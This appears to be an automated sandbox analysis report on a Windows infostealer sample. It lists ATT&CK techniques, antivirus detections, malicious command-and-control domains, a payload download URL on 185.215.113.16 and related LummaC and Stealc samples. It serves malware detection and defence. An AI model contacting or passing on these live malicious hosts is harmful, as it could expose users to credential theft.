Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	44 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Process Injection	LSASS Memory	861 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	44 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	233 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
UmotQ1qjLq.exe	66%	ReversingLabs	Win32.Infostealer.Tinba
UmotQ1qjLq.exe	100%	Avira	TR/Crypt.TPM.Gen
UmotQ1qjLq.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://fancywaxxers.shop/ode	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apiV	100%	Avira URL Cloud	malware
https://fancywaxxers.shop:443/api	100%	Avira URL Cloud	malware
wholersorie.shop	100%	Avira URL Cloud	malware
cloudewahsj.shop	100%	Avira URL Cloud	malware
rabidcowse.shop	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/g	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apite	100%	Avira URL Cloud	malware
fancywaxxers.shop	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/c	100%	Avira URL Cloud	malware
noisycuttej.shop	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/5	100%	Avira URL Cloud	malware
nearycrepso.shop	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/api	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/	100%	Avira URL Cloud	malware
framekgirus.shop	100%	Avira URL Cloud	malware
tirepublicerj.shop	100%	Avira URL Cloud	malware
abruptyopsn.shop	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fancywaxxers.shop	104.21.96.1	true	true	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.google.com	142.250.185.68	true	false	high
js.monitor.azure.com	unknown	unknown	false	high
mdec.nelreports.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
fancywaxxers.shop	true	Avira URL Cloud: malware	unknown
rabidcowse.shop	true	Avira URL Cloud: malware	unknown
wholersorie.shop	true	Avira URL Cloud: malware	unknown
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js	false		high
cloudewahsj.shop	true	Avira URL Cloud: malware	unknown
noisycuttej.shop	true	Avira URL Cloud: malware	unknown
nearycrepso.shop	true	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/api	true	Avira URL Cloud: malware	unknown
framekgirus.shop	true	Avira URL Cloud: malware	unknown
tirepublicerj.shop	true	Avira URL Cloud: malware	unknown
abruptyopsn.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf	chromecache_103.6.dr	false		high
https://duckduckgo.com/chrome_newtab	UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/ode	UmotQ1qjLq.exe, 00000000.00000003.2073046149.000000000165A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.microsoft	UmotQ1qjLq.exe, 00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2072937199.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1953164335.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1950540598.0000000001671000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000002.2158230840.000000000165A000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1900113407.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1966734692.00000000016A0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/	chromecache_103.6.dr	false		high
http://185.215.113.16/off/def.exeW	UmotQ1qjLq.exe, 00000000.00000003.2072937199.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2073151395.00000000016B5000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000002.2158230840.000000000165A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	UmotQ1qjLq.exe, 00000000.00000003.1933417555.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.linkedin.com/cws/share?url=$	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	UmotQ1qjLq.exe, 00000000.00000003.1903645540.0000000005C70000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1903726491.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1916001846.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1916759878.0000000005C69000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Youssef1313	chromecache_103.6.dr	false		high
https://fancywaxxers.shop/apiV	UmotQ1qjLq.exe, 00000000.00000003.1900133376.0000000001679000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://aka.ms/msignite_docs_banner	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9	chromecache_86.6.dr	false		high
http://polymer.github.io/AUTHORS.txt	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml	chromecache_103.6.dr	false		high
https://management.azure.com/subscriptions?api-version=2016-06-01	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md	chromecache_103.6.dr	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	UmotQ1qjLq.exe, 00000000.00000003.1933417555.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pshelpmechoose	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://aka.ms/feedback/report?space=61	chromecache_103.6.dr, chromecache_110.6.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	UmotQ1qjLq.exe, 00000000.00000003.1903726491.0000000005C44000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://learn-video.azurefd.net/vod/player	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://twitter.com/intent/tweet?original_referer=$	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://github.com/gewarren	chromecache_103.6.dr	false		high
https://support.mozilla.org/products/firefoxgro.all	UmotQ1qjLq.exe, 00000000.00000003.1933099829.0000000005D33000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/CONTRIBUTORS.txt	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://fancywaxxers.shop:443/api	UmotQ1qjLq.exe, 00000000.00000003.1953079056.00000000016D6000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1950540598.00000000016D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	UmotQ1qjLq.exe, 00000000.00000003.1933417555.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md	chromecache_103.6.dr	false		high
https://fancywaxxers.shop/g	UmotQ1qjLq.exe, 00000000.00000003.1966758838.0000000001672000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725	chromecache_103.6.dr	false		high
https://client-api.arkoselabs.com/v2/api.js	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	UmotQ1qjLq.exe, 00000000.00000003.1933417555.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	false		high
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Thraka	chromecache_103.6.dr	false		high
https://fancywaxxers.shop/apite	UmotQ1qjLq.exe, 00000000.00000003.1953079056.00000000016D6000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1950540598.00000000016D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://polymer.github.io/PATENTS.txt	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://aka.ms/certhelp	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://fancywaxxers.shop/c	UmotQ1qjLq.exe, 00000000.00000003.2072679464.0000000005C47000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	UmotQ1qjLq.exe, 00000000.00000003.1933417555.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mairaw	chromecache_103.6.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	UmotQ1qjLq.exe, 00000000.00000003.1903645540.0000000005C70000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1903726491.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1916001846.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1916759878.0000000005C69000.00000004.00000800.00020000.00000000.sdmp	false		high
https://schema.org	chromecache_86.6.dr	false		high
http://polymer.github.io/LICENSE.txt	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://www.ecosia.org/newtab/	UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	UmotQ1qjLq.exe, 00000000.00000003.1933099829.0000000005D33000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/yourcaliforniaprivacychoices	chromecache_103.6.dr	false		high
https://ac.ecosia.org/autocomplete?q=	UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/nschonni	chromecache_103.6.dr	false		high
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://github.com/adegeo	chromecache_103.6.dr	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	UmotQ1qjLq.exe, 00000000.00000003.1933417555.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	UmotQ1qjLq.exe, 00000000.00000003.1903645540.0000000005C72000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/jonschlinkert/is-plain-object	chromecache_108.6.dr, chromecache_86.6.dr	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	UmotQ1qjLq.exe, 00000000.00000003.1931935186.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://octokit.github.io/rest.js/#throttling	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://fancywaxxers.shop/5	UmotQ1qjLq.exe, 00000000.00000003.1966934832.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1931057736.0000000005C17000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1949492194.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1944704562.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1931399244.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/js-cookie/js-cookie	chromecache_108.6.dr, chromecache_86.6.dr	false		high
http://185.215.113.16/off/def.exe	UmotQ1qjLq.exe, 00000000.00000003.2072937199.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2073151395.00000000016B5000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000002.2157836075.0000000000FAB000.00000004.00000010.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000002.2158230840.000000000165A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schema.org/Organization	chromecache_103.6.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	UmotQ1qjLq.exe, 00000000.00000003.1903726491.0000000005C44000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/	UmotQ1qjLq.exe, 00000000.00000003.1900133376.0000000001642000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1949929378.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1944704562.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1966758838.0000000001672000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1900133376.0000000001679000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2073046149.000000000165A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://channel9.msdn.com/	chromecache_108.6.dr, chromecache_86.6.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	UmotQ1qjLq.exe, 00000000.00000003.1901929364.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1901997864.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/dotnet/try	chromecache_108.6.dr, chromecache_86.6.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.68	www.google.com	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.96.1	fancywaxxers.shop	United States	13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.16
192.168.2.4

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582424
Start date and time:	2024-12-30 15:52:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	UmotQ1qjLq.exe renamed because original name is a hash value
Original Sample Name:	0c317f381e79d53cf9cdfce0497448c0.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/66@9/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 184.28.89.167, 142.250.184.195, 142.250.185.206, 74.125.133.84, 88.221.170.101, 142.250.185.238, 142.250.186.174, 142.250.181.238, 172.217.18.10, 142.250.186.42, 142.250.186.106, 142.250.181.234, 216.58.212.138, 172.217.16.138, 142.250.186.138, 142.250.185.170, 142.250.185.138, 142.250.186.170, 216.58.206.42, 142.250.185.202, 142.250.184.202, 142.250.185.106, 142.250.186.74, 142.250.185.234, 51.105.71.136, 2.16.168.100, 2.16.168.102, 13.74.129.1, 20.189.173.8, 13.107.21.237, 204.79.197.237, 142.250.184.238, 142.250.184.206, 172.217.16.195, 216.58.212.174, 20.12.23.50, 13.107.246.45, 184.28.90.27
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, onedscolprdwus07.westus.cloudapp.azure.com, go.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, onedscolprduks00.uksouth.cloudapp.azure.com, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: UmotQ1qjLq.exe

Simulations

Behavior and APIs

Time	Type	Description
09:53:19	API Interceptor	112x Sleep call for process: UmotQ1qjLq.exe modified

LLM Input / Output

Input	Output
URL: https://microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://microsoft.com
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Register now", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.16	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	TdloJt4gY3.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	726odELDs8.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	v5Evrl41VR.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	o0cabS0OQn.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	mDuCbT8LnH.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fancywaxxers.shop	R3nz_Loader.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
fancywaxxers.shop	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
s-part-0017.t-0009.t-msedge.net	Open Purchase Order Summary Details-16-12-2024.vbs	Get hash	malicious	LodaRAT, XRed	Browse	13.107.246.45
	Open Purchase Order Summary Sheet.vbs	Get hash	malicious	LodaRAT, XRed	Browse	13.107.246.45
	xyxmml.msi	Get hash	malicious	XRed	Browse	13.107.246.45
	valyzt.msi	Get hash	malicious	XRed	Browse	13.107.246.45
	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse	13.107.246.45
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse	13.107.246.45
	sdlvrr.msi	Get hash	malicious	LodaRAT	Browse	13.107.246.45
	docx.msi	Get hash	malicious	XRed	Browse	13.107.246.45
	hoaiuy.msi	Get hash	malicious	XRed	Browse	13.107.246.45
	222.msi	Get hash	malicious	XRed	Browse	13.107.246.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://aiihsr.com/FloridaCU	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://flowto.it/8tooc2sec?fc=0	Get hash	malicious	Unknown	Browse	104.18.35.227
	https://btrhbfeojofxcpxuwnsp5h7h22htohw4btqegnxatocbkgdlfiawhyid.at	Get hash	malicious	Unknown	Browse	104.21.20.126
	https://btrhbfeojofxcpxuwnsp5h7h22htohw4btqegnxatocbkgdlfiawhyid.at	Get hash	malicious	Unknown	Browse	172.67.192.228
	eXbhgU9.exe	Get hash	malicious	LummaC	Browse	104.21.18.19
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Supplier.bat	Get hash	malicious	Unknown	Browse	172.67.144.225
	Supplier.bat	Get hash	malicious	LodaRAT, XRed	Browse	172.67.144.225
	NEW-DRAWING-SHEET.bat	Get hash	malicious	Unknown	Browse	172.67.144.225
WHOLESALECONNECTIONSNL	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	TdloJt4gY3.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	726odELDs8.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	v5Evrl41VR.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	o0cabS0OQn.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.215.113.206

JA3 Fingerprints

